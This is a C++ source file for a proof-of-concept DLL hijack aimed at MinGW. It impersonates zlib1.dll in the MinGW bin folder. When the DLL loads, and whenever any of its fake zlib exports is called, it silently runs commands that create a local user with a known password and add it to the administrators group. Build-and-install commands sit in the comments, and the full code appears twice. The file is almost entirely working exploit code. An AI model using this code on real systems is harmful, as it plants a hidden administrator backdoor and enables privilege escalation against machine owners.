felmoltor/zlib1.dll.cpp

## zlib1.dll.cpp
// Author: Felipe Molina (@felmoltor)
//

// MinGW DLL Hijack Privilege Escalation POC.
// This dll will suplantate the legitimate library "zlib1.dll" residing inside
// the default installation folder of MinGW "C:\MinGW\bin\zlib1.dll"
//

// g++ -c -DPRIVESC_DLL mingwprivesc.dll.cpp & g++ -shared -o mingwprivesc.dll mingwprivesc.dll.o -Wl,--out-implib,main.a & copy /y mingwprivesc.dll C:\MinGW\bin\zlib1.dll

#include <windows.h>

extern "C" __declspec(dllexport) int compress() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

extern "C" __declspec(dllexport) int compressBound() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

extern "C" __declspec(dllexport) int inflateEnd() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}


extern "C" __declspec(dllexport) int inflateInit_() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

extern "C" __declspec(dllexport) int inflateReset() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

extern "C" __declspec(dllexport) int inflate() {
 WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
 WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
 return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
 compress();
 return TRUE;
}
	// Author: Felipe Molina (@felmoltor)
	//

	// MinGW DLL Hijack Privilege Escalation POC.
	// This dll will suplantate the legitimate library "zlib1.dll" residing inside
	// the default installation folder of MinGW "C:\MinGW\bin\zlib1.dll"
	//

	// g++ -c -DPRIVESC_DLL mingwprivesc.dll.cpp & g++ -shared -o mingwprivesc.dll mingwprivesc.dll.o -Wl,--out-implib,main.a & copy /y mingwprivesc.dll C:\MinGW\bin\zlib1.dll

	#include <windows.h>

	extern "C" __declspec(dllexport) int compress() {
	WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
	WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
	return 0;
	}

	extern "C" __declspec(dllexport) int compressBound() {
	WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
	WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
	return 0;
	}

	extern "C" __declspec(dllexport) int inflateEnd() {
	WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
	WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
	return 0;
	}


	extern "C" __declspec(dllexport) int inflateInit_() {
	WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
	WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
	return 0;
	}

	extern "C" __declspec(dllexport) int inflateReset() {
	WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
	WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
	return 0;
	}

	extern "C" __declspec(dllexport) int inflate() {
	WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
	WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
	return 0;
	}

	BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
	{
	compress();
	return TRUE;
	}